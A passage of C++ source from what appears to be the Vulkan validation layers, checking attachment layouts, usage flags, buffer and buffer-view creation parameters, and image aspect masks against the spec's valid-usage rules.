"VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for input attachment reference %u in subpass %u is %s but must be " "DEPTH_STENCIL_READ_ONLY, SHADER_READ_ONLY_OPTIMAL, or GENERAL.", j, i, string_VkImageLayout(subpass.pDepthStencilAttachment->layout)); break; case VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL_KHR: case VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL_KHR: if (GetDeviceExtensions()->vk_khr_maintenance2) { break; } else { // Intentionally fall through to generic error message } // fall through default: // No other layouts are acceptable skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for input attachment is %s but can only be READ_ONLY_OPTIMAL or GENERAL.", string_VkImageLayout(subpass.pInputAttachments[j].layout)); } if (attach_first_use[attach_index]) { skip |= ValidateLayoutVsAttachmentDescription(report_data, rp_version, subpass.pInputAttachments[j].layout, attach_index, pCreateInfo->pAttachments[attach_index]); bool used_as_depth = (subpass.pDepthStencilAttachment != NULL && subpass.pDepthStencilAttachment->attachment == attach_index); bool used_as_color = false; for (uint32_t k = 0; !used_as_depth && !used_as_color && k < subpass.colorAttachmentCount; ++k) { used_as_color = (subpass.pColorAttachments[k].attachment == attach_index); } if (!used_as_depth && !used_as_color && pCreateInfo->pAttachments[attach_index].loadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { vuid = use_rp2 ? 
"VUID-VkSubpassDescription2KHR-loadOp-03064" : "VUID-VkSubpassDescription-loadOp-00846"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "%s: attachment %u is first used as an input attachment in subpass %u with loadOp=CLEAR.", function_name, attach_index, attach_index); } } attach_first_use[attach_index] = false; } for (uint32_t j = 0; j < subpass.colorAttachmentCount; ++j) { auto attach_index = subpass.pColorAttachments[j].attachment; if (attach_index == VK_ATTACHMENT_UNUSED) continue; // TODO: Need a way to validate shared presentable images here, currently just allowing // VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR // as an acceptable layout, but need to make sure shared presentable images ONLY use that layout switch (subpass.pColorAttachments[j].layout) { case VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL: // This is ideal. case VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR: // TODO: See note above, just assuming that attachment is shared presentable and allowing this for now. break; case VK_IMAGE_LAYOUT_GENERAL: // May not be optimal; TODO: reconsider this warning based on other constraints? skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for color attachment is GENERAL but should be COLOR_ATTACHMENT_OPTIMAL."); break; case VK_IMAGE_LAYOUT_UNDEFINED: case VK_IMAGE_LAYOUT_PREINITIALIZED: vuid = use_rp2 ? 
"VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for color attachment reference %u in subpass %u is %s but should be " "COLOR_ATTACHMENT_OPTIMAL or GENERAL.", j, i, string_VkImageLayout(subpass.pColorAttachments[j].layout)); break; default: skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for color attachment is %s but can only be COLOR_ATTACHMENT_OPTIMAL or GENERAL.", string_VkImageLayout(subpass.pColorAttachments[j].layout)); } if (subpass.pResolveAttachments && (subpass.pResolveAttachments[j].attachment != VK_ATTACHMENT_UNUSED) && (subpass.pResolveAttachments[j].layout == VK_IMAGE_LAYOUT_UNDEFINED || subpass.pResolveAttachments[j].layout == VK_IMAGE_LAYOUT_PREINITIALIZED)) { vuid = use_rp2 ? "VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for resolve attachment reference %u in subpass %u is %s but should be " "COLOR_ATTACHMENT_OPTIMAL or GENERAL.", j, i, string_VkImageLayout(subpass.pResolveAttachments[j].layout)); } if (attach_first_use[attach_index]) { skip |= ValidateLayoutVsAttachmentDescription(report_data, rp_version, subpass.pColorAttachments[j].layout, attach_index, pCreateInfo->pAttachments[attach_index]); } attach_first_use[attach_index] = false; } if (subpass.pDepthStencilAttachment && subpass.pDepthStencilAttachment->attachment != VK_ATTACHMENT_UNUSED) { switch (subpass.pDepthStencilAttachment->layout) { case VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL: case VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL: // These are ideal. 
break; case VK_IMAGE_LAYOUT_GENERAL: // May not be optimal; TODO: reconsider this warning based on other constraints? GENERAL can be better than // doing a bunch of transitions. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "GENERAL layout for depth attachment may not give optimal performance."); break; case VK_IMAGE_LAYOUT_UNDEFINED: case VK_IMAGE_LAYOUT_PREINITIALIZED: vuid = use_rp2 ? "VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for depth attachment reference in subpass %u is %s but must be a valid depth/stencil " "layout or GENERAL.", i, string_VkImageLayout(subpass.pDepthStencilAttachment->layout)); break; case VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL_KHR: case VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL_KHR: if (GetDeviceExtensions()->vk_khr_maintenance2) { break; } else { // Intentionally fall through to generic error message } // fall through default: // No other layouts are acceptable skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for depth attachment is %s but can only be DEPTH_STENCIL_ATTACHMENT_OPTIMAL, " "DEPTH_STENCIL_READ_ONLY_OPTIMAL or GENERAL.", string_VkImageLayout(subpass.pDepthStencilAttachment->layout)); } auto attach_index = subpass.pDepthStencilAttachment->attachment; if (attach_first_use[attach_index]) { skip |= ValidateLayoutVsAttachmentDescription(report_data, rp_version, subpass.pDepthStencilAttachment->layout, attach_index, pCreateInfo->pAttachments[attach_index]); } attach_first_use[attach_index] = false; } } return skip; } // For any image objects that overlap mapped memory, verify that their layouts are PREINIT or GENERAL 
bool CoreChecks::ValidateMapImageLayouts(VkDevice device, DEVICE_MEM_INFO const *mem_info, VkDeviceSize offset,
                                         VkDeviceSize end_offset) {
    bool skip = false;
    // Iterate over all bound image ranges and verify that for any that overlap the map ranges, the layouts are
    // VK_IMAGE_LAYOUT_PREINITIALIZED or VK_IMAGE_LAYOUT_GENERAL
    // TODO : This can be optimized if we store ranges based on starting address and early exit when we pass our range
    for (auto image_handle : mem_info->bound_images) {
        auto img_it = mem_info->bound_ranges.find(image_handle);
        if (img_it != mem_info->bound_ranges.end()) {
            if (RangesIntersect(&img_it->second, offset, end_offset)) {
                std::vector<VkImageLayout> layouts;
                if (FindLayouts(VkImage(image_handle), layouts)) {
                    for (auto layout : layouts) {
                        if (layout != VK_IMAGE_LAYOUT_PREINITIALIZED && layout != VK_IMAGE_LAYOUT_GENERAL) {
                            skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT,
                                            VK_DEBUG_REPORT_OBJECT_TYPE_DEVICE_MEMORY_EXT, HandleToUint64(mem_info->mem),
                                            kVUID_Core_DrawState_InvalidImageLayout,
                                            "Mapping an image with layout %s can result in undefined behavior if this memory is used "
                                            "by the device. Only GENERAL or PREINITIALIZED should be used.",
                                            string_VkImageLayout(layout));
                        }
                    }
                }
            }
        }
    }
    return skip;
}

// Helper function to validate correct usage bits set for buffers or images. Verify that (actual & desired) flags != 0 or, if strict
// is true, verify that (actual & desired) flags == desired
bool CoreChecks::ValidateUsageFlags(VkFlags actual, VkFlags desired, VkBool32 strict, uint64_t obj_handle,
                                    VulkanObjectType obj_type, const char *msgCode, char const *func_name, char const *usage_str) {
    bool correct_usage = false;
    bool skip = false;
    const char *type_str = object_string[obj_type];
    if (strict) {
        correct_usage = ((actual & desired) == desired);
    } else {
        correct_usage = ((actual & desired) != 0);
    }
    if (!correct_usage) {
        if (msgCode == kVUIDUndefined) {
            // TODO: Fix callers with kVUIDUndefined to use correct validation checks.
            skip = log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, get_debug_report_enum[obj_type], obj_handle,
                           kVUID_Core_MemTrack_InvalidUsageFlag,
                           "Invalid usage flag for %s %s used by %s. In this case, %s should have %s set during creation.",
                           type_str, report_data->FormatHandle(obj_handle).c_str(), func_name, type_str, usage_str);
        } else {
            skip = log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, get_debug_report_enum[obj_type], obj_handle, msgCode,
                           "Invalid usage flag for %s %s used by %s. In this case, %s should have %s set during creation.",
                           type_str, report_data->FormatHandle(obj_handle).c_str(), func_name, type_str, usage_str);
        }
    }
    return skip;
}

// Helper function to validate usage flags for images. For given image_state send actual vs. desired usage off to helper above
// where an error will be flagged if usage is not correct
// (Original comment said "buffers" -- copy-paste; this overload handles images.)
bool CoreChecks::ValidateImageUsageFlags(IMAGE_STATE const *image_state, VkFlags desired, bool strict, const char *msgCode,
                                         char const *func_name, char const *usage_string) {
    return ValidateUsageFlags(image_state->createInfo.usage, desired, strict, HandleToUint64(image_state->image),
                              kVulkanObjectTypeImage, msgCode, func_name, usage_string);
}

// Verify that the image's format supports all 'desired' format-feature bits for its tiling mode
// (linearTilingFeatures for LINEAR, optimalTilingFeatures for OPTIMAL).
bool CoreChecks::ValidateImageFormatFeatureFlags(IMAGE_STATE const *image_state, VkFormatFeatureFlags desired,
                                                 char const *func_name, const char *linear_vuid, const char *optimal_vuid) {
    VkFormatProperties format_properties = GetPDFormatProperties(image_state->createInfo.format);
    bool skip = false;
    if (image_state->createInfo.tiling == VK_IMAGE_TILING_LINEAR) {
        if ((format_properties.linearTilingFeatures & desired) != desired) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image_state->image), linear_vuid,
                            "In %s, invalid linearTilingFeatures (0x%08X) for format %u used by image %s.", func_name,
                            format_properties.linearTilingFeatures, image_state->createInfo.format,
                            report_data->FormatHandle(image_state->image).c_str());
        }
    } else if (image_state->createInfo.tiling == VK_IMAGE_TILING_OPTIMAL) {
        if ((format_properties.optimalTilingFeatures & desired) != desired) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image_state->image), optimal_vuid,
                            "In %s, invalid optimalTilingFeatures (0x%08X) for format %u used by image %s.", func_name,
                            format_properties.optimalTilingFeatures, image_state->createInfo.format,
                            report_data->FormatHandle(image_state->image).c_str());
        }
    }
    return skip;
}

// Validate a VkImageSubresourceLayers struct: non-zero layerCount, no METADATA aspect, and
// COLOR must not be combined with DEPTH/STENCIL.
bool CoreChecks::ValidateImageSubresourceLayers(const GLOBAL_CB_NODE *cb_node, const VkImageSubresourceLayers *subresource_layers,
                                                char const *func_name, char const *member, uint32_t i) {
    bool skip = false;
    // layerCount must not be zero
    if (subresource_layers->layerCount == 0) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(cb_node->commandBuffer), "VUID-VkImageSubresourceLayers-layerCount-01700",
                        "In %s, pRegions[%u].%s.layerCount must not be zero.", func_name, i, member);
    }
    // aspectMask must not contain VK_IMAGE_ASPECT_METADATA_BIT
    if (subresource_layers->aspectMask & VK_IMAGE_ASPECT_METADATA_BIT) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(cb_node->commandBuffer), "VUID-VkImageSubresourceLayers-aspectMask-00168",
                        "In %s, pRegions[%u].%s.aspectMask has VK_IMAGE_ASPECT_METADATA_BIT set.", func_name, i, member);
    }
    // if aspectMask contains COLOR, it must not contain either DEPTH or STENCIL
    if ((subresource_layers->aspectMask & VK_IMAGE_ASPECT_COLOR_BIT) &&
        (subresource_layers->aspectMask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT))) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(cb_node->commandBuffer), "VUID-VkImageSubresourceLayers-aspectMask-00167",
                        "In %s, pRegions[%u].%s.aspectMask has VK_IMAGE_ASPECT_COLOR_BIT and either VK_IMAGE_ASPECT_DEPTH_BIT or "
                        "VK_IMAGE_ASPECT_STENCIL_BIT set.",
                        func_name, i, member);
    }
    return skip;
}

// Helper function to validate usage flags for buffers. For given buffer_state send actual vs. desired usage off to helper above
// where an error will be flagged if usage is not correct
bool CoreChecks::ValidateBufferUsageFlags(BUFFER_STATE const *buffer_state, VkFlags desired, bool strict, const char *msgCode,
                                          char const *func_name, char const *usage_string) {
    return ValidateUsageFlags(buffer_state->createInfo.usage, desired, strict, HandleToUint64(buffer_state->buffer),
                              kVulkanObjectTypeBuffer, msgCode, func_name, usage_string);
}

// Validate VkBufferViewCreateInfo::range against the element size of the view format, the buffer size,
// and device limits. Checks apply only when range != VK_WHOLE_SIZE.
bool CoreChecks::ValidateBufferViewRange(const BUFFER_STATE *buffer_state, const VkBufferViewCreateInfo *pCreateInfo,
                                         const VkPhysicalDeviceLimits *device_limits) {
    bool skip = false;
    const VkDeviceSize &range = pCreateInfo->range;
    if (range != VK_WHOLE_SIZE) {
        // Range must be greater than 0 (range is unsigned, so this only catches range == 0)
        if (range <= 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-range-00928",
                            "If VkBufferViewCreateInfo range (%" PRIuLEAST64
                            ") does not equal VK_WHOLE_SIZE, range must be greater than 0.",
                            range);
        }
        // Range must be a multiple of the element size of format
        const size_t format_size = FormatElementSize(pCreateInfo->format);
        if (range % format_size != 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-range-00929",
                            "If VkBufferViewCreateInfo range (%" PRIuLEAST64
                            ") does not equal VK_WHOLE_SIZE, range must be a multiple of the element size of the format "
                            "(" PRINTF_SIZE_T_SPECIFIER ").",
                            range, format_size);
        }
        // Range divided by the element size of format must be less than or equal to VkPhysicalDeviceLimits::maxTexelBufferElements
        if (range / format_size >
device_limits->maxTexelBufferElements) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-range-00930",
                            "If VkBufferViewCreateInfo range (%" PRIuLEAST64
                            ") does not equal VK_WHOLE_SIZE, range divided by the element size of the format (" PRINTF_SIZE_T_SPECIFIER
                            ") must be less than or equal to VkPhysicalDeviceLimits::maxTexelBufferElements (%" PRIuLEAST32 ").",
                            range, format_size, device_limits->maxTexelBufferElements);
        }
        // The sum of range and offset must be less than or equal to the size of buffer
        if (range + pCreateInfo->offset > buffer_state->createInfo.size) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-offset-00931",
                            "If VkBufferViewCreateInfo range (%" PRIuLEAST64
                            ") does not equal VK_WHOLE_SIZE, the sum of offset (%" PRIuLEAST64
                            ") and range must be less than or equal to the size of the buffer (%" PRIuLEAST64 ").",
                            range, pCreateInfo->offset, buffer_state->createInfo.size);
        }
    }
    return skip;
}

// Verify the view's format exposes the buffer-feature bits required by the buffer's texel-buffer usage flags.
bool CoreChecks::ValidateBufferViewBuffer(const BUFFER_STATE *buffer_state, const VkBufferViewCreateInfo *pCreateInfo) {
    bool skip = false;
    const VkFormatProperties format_properties = GetPDFormatProperties(pCreateInfo->format);
    if ((buffer_state->createInfo.usage & VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT) &&
        !(format_properties.bufferFeatures & VK_FORMAT_FEATURE_UNIFORM_TEXEL_BUFFER_BIT)) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                        HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-buffer-00933",
                        "If buffer was created with `usage` containing VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT, format must "
                        "be supported for uniform texel buffers");
    }
    if ((buffer_state->createInfo.usage & VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT) &&
        !(format_properties.bufferFeatures & VK_FORMAT_FEATURE_STORAGE_TEXEL_BUFFER_BIT)) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                        HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-buffer-00934",
                        "If buffer was created with `usage` containing VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT, format must "
                        "be supported for storage texel buffers");
    }
    return skip;
}

// Validate vkCreateBuffer: sparse and device-address create flags/usages require the corresponding
// enabled device features; concurrent sharing mode requires valid queue family indices.
bool CoreChecks::PreCallValidateCreateBuffer(VkDevice device, const VkBufferCreateInfo *pCreateInfo,
                                             const VkAllocationCallbacks *pAllocator, VkBuffer *pBuffer) {
    bool skip = false;

    // TODO: Add check for "VUID-vkCreateBuffer-flags-00911" (sparse address space accounting)

    if ((pCreateInfo->flags & VK_BUFFER_CREATE_SPARSE_BINDING_BIT) && (!GetEnabledFeatures()->core.sparseBinding)) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0,
                        "VUID-VkBufferCreateInfo-flags-00915",
                        "vkCreateBuffer(): the sparseBinding device feature is disabled: Buffers cannot be created with the "
                        "VK_BUFFER_CREATE_SPARSE_BINDING_BIT set.");
    }

    if ((pCreateInfo->flags & VK_BUFFER_CREATE_SPARSE_RESIDENCY_BIT) && (!GetEnabledFeatures()->core.sparseResidencyBuffer)) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0,
                        "VUID-VkBufferCreateInfo-flags-00916",
                        "vkCreateBuffer(): the sparseResidencyBuffer device feature is disabled: Buffers cannot be created with "
                        "the VK_BUFFER_CREATE_SPARSE_RESIDENCY_BIT set.");
    }

    if ((pCreateInfo->flags & VK_BUFFER_CREATE_SPARSE_ALIASED_BIT) && (!GetEnabledFeatures()->core.sparseResidencyAliased)) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0,
                        "VUID-VkBufferCreateInfo-flags-00917",
                        "vkCreateBuffer(): the sparseResidencyAliased device feature is disabled: Buffers cannot be created with "
                        "the VK_BUFFER_CREATE_SPARSE_ALIASED_BIT set.");
    }

    // A non-zero opaque capture address in the pNext chain requires the capture/replay create flag.
    auto chained_devaddr_struct = lvl_find_in_chain<VkBufferDeviceAddressCreateInfoEXT>(pCreateInfo->pNext);
    if (chained_devaddr_struct) {
        if (!(pCreateInfo->flags & VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT) &&
            chained_devaddr_struct->deviceAddress != 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0,
                            "VUID-VkBufferCreateInfo-deviceAddress-02604",
                            "vkCreateBuffer(): Non-zero VkBufferDeviceAddressCreateInfoEXT::deviceAddress "
                            "requires VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT.");
        }
    }

    if ((pCreateInfo->flags & VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT) &&
        !GetEnabledFeatures()->buffer_address.bufferDeviceAddressCaptureReplay) {
        skip |= log_msg(
            report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0,
            "VUID-VkBufferCreateInfo-flags-02605",
            "vkCreateBuffer(): the bufferDeviceAddressCaptureReplay device feature is disabled: Buffers cannot be created with "
            "the VK_BUFFER_CREATE_DEVICE_ADDRESS_CAPTURE_REPLAY_BIT_EXT set.");
    }

    if ((pCreateInfo->usage & VK_BUFFER_USAGE_SHADER_DEVICE_ADDRESS_BIT_EXT) &&
        !GetEnabledFeatures()->buffer_address.bufferDeviceAddress) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0,
                        "VUID-VkBufferCreateInfo-usage-02606",
                        "vkCreateBuffer(): the bufferDeviceAddress device feature is disabled: Buffers cannot be created with "
                        "the VK_BUFFER_USAGE_SHADER_DEVICE_ADDRESS_BIT_EXT set.");
    }

    if (pCreateInfo->sharingMode == VK_SHARING_MODE_CONCURRENT && pCreateInfo->pQueueFamilyIndices) {
        skip |= ValidateQueueFamilies(pCreateInfo->queueFamilyIndexCount, pCreateInfo->pQueueFamilyIndices, "vkCreateBuffer",
                                      "pCreateInfo->pQueueFamilyIndices", "VUID-VkBufferCreateInfo-sharingMode-01419",
                                      "VUID-VkBufferCreateInfo-sharingMode-01419", false);
    }

    return skip;
}

// Record-side hook for vkCreateBuffer: on success, create and track BUFFER_STATE for the new buffer.
void CoreChecks::PostCallRecordCreateBuffer(VkDevice device, const VkBufferCreateInfo *pCreateInfo,
                                            const VkAllocationCallbacks *pAllocator, VkBuffer *pBuffer, VkResult result) {
    if (result != VK_SUCCESS) return;
    // TODO : This doesn't create deep copy of pQueueFamilyIndices so need to fix that if/when we want that data to be valid
    GetBufferMap()->insert(std::make_pair(*pBuffer, std::unique_ptr<BUFFER_STATE>(new BUFFER_STATE(*pBuffer, pCreateInfo))));
}

// Validate vkCreateBufferView: buffer must be memory-backed, created with a texel-buffer usage bit,
// and the view's offset/range must satisfy the buffer size and device limits.
bool CoreChecks::PreCallValidateCreateBufferView(VkDevice device, const VkBufferViewCreateInfo *pCreateInfo,
                                                 const VkAllocationCallbacks *pAllocator, VkBufferView *pView) {
    bool skip = false;
    BUFFER_STATE *buffer_state = GetBufferState(pCreateInfo->buffer);
    // If this isn't a sparse buffer, it needs to have memory backing it at CreateBufferView time
    if (buffer_state) {
        skip |= ValidateMemoryIsBoundToBuffer(buffer_state, "vkCreateBufferView()", "VUID-VkBufferViewCreateInfo-buffer-00935");
        // In order to create a valid buffer view, the buffer must have been created with at least one of the following flags:
        // UNIFORM_TEXEL_BUFFER_BIT or STORAGE_TEXEL_BUFFER_BIT
        skip |= ValidateBufferUsageFlags(buffer_state,
                                         VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT | VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT,
                                         false, "VUID-VkBufferViewCreateInfo-buffer-00932", "vkCreateBufferView()",
                                         "VK_BUFFER_USAGE_[STORAGE|UNIFORM]_TEXEL_BUFFER_BIT");

        // Buffer view offset must be less than the size of buffer
        if (pCreateInfo->offset >= buffer_state->createInfo.size) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-offset-00925",
                            "VkBufferViewCreateInfo offset (%" PRIuLEAST64
                            ") must be less than the size of the buffer (%" PRIuLEAST64 ").",
                            pCreateInfo->offset, buffer_state->createInfo.size);
        }

        const VkPhysicalDeviceLimits *device_limits = &(GetPDProperties()->limits);
        // Buffer view offset must be a multiple of VkPhysicalDeviceLimits::minTexelBufferOffsetAlignment
        if ((pCreateInfo->offset % device_limits->minTexelBufferOffsetAlignment) != 0) {
            skip |= log_msg(report_data,
VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer_state->buffer), "VUID-VkBufferViewCreateInfo-offset-00926",
                            "VkBufferViewCreateInfo offset (%" PRIuLEAST64
                            ") must be a multiple of VkPhysicalDeviceLimits::minTexelBufferOffsetAlignment (%" PRIuLEAST64 ").",
                            pCreateInfo->offset, device_limits->minTexelBufferOffsetAlignment);
        }

        skip |= ValidateBufferViewRange(buffer_state, pCreateInfo, device_limits);
        skip |= ValidateBufferViewBuffer(buffer_state, pCreateInfo);
    }
    return skip;
}

// Record-side hook for vkCreateBufferView: on success, create and track BUFFER_VIEW_STATE for the new view.
void CoreChecks::PostCallRecordCreateBufferView(VkDevice device, const VkBufferViewCreateInfo *pCreateInfo,
                                                const VkAllocationCallbacks *pAllocator, VkBufferView *pView, VkResult result) {
    if (result != VK_SUCCESS) return;
    (*GetBufferViewMap())[*pView] = std::unique_ptr<BUFFER_VIEW_STATE>(new BUFFER_VIEW_STATE(*pView, pCreateInfo));
}

// For the given format verify that the aspect masks make sense
bool CoreChecks::ValidateImageAspectMask(VkImage image, VkFormat format, VkImageAspectFlags aspect_mask, const char *func_name,
                                         const char *vuid) {
    bool skip = false;
    // Report against the image when a handle was provided; otherwise fall back to the UNKNOWN object type.
    VkDebugReportObjectTypeEXT objectType = VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT;
    if (image != VK_NULL_HANDLE) {
        objectType = VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT;
    }
    if (FormatIsColor(format)) {
        // Color formats: exactly VK_IMAGE_ASPECT_COLOR_BIT, and nothing else.
        if ((aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) != VK_IMAGE_ASPECT_COLOR_BIT) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Color image formats must have the VK_IMAGE_ASPECT_COLOR_BIT set.", func_name);
        } else if ((aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) != aspect_mask) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Color image formats must have ONLY the VK_IMAGE_ASPECT_COLOR_BIT set.", func_name);
        }
    } else if (FormatIsDepthAndStencil(format)) {
        // Combined depth/stencil: at least one of DEPTH/STENCIL, and no other bits.
        if ((aspect_mask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT)) == 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Depth/stencil image formats must have at least one of VK_IMAGE_ASPECT_DEPTH_BIT and "
                            "VK_IMAGE_ASPECT_STENCIL_BIT set.",
                            func_name);
        } else if ((aspect_mask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT)) != aspect_mask) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, objectType, HandleToUint64(image), vuid,
                            "%s: Combination depth/stencil image formats can have only the VK_IMAGE_ASPECT_DEPTH_BIT and "
                            "VK_IMAGE_ASPECT_STENCIL_BIT set.",
                            func_name);
        }
    } else if (FormatIsDepthOnly(format)) {
        if ((aspect_mask & VK_IMAGE_ASPECT_DEPTH_BIT) != VK_IMAGE_ASPECT_DEPTH_BIT) {
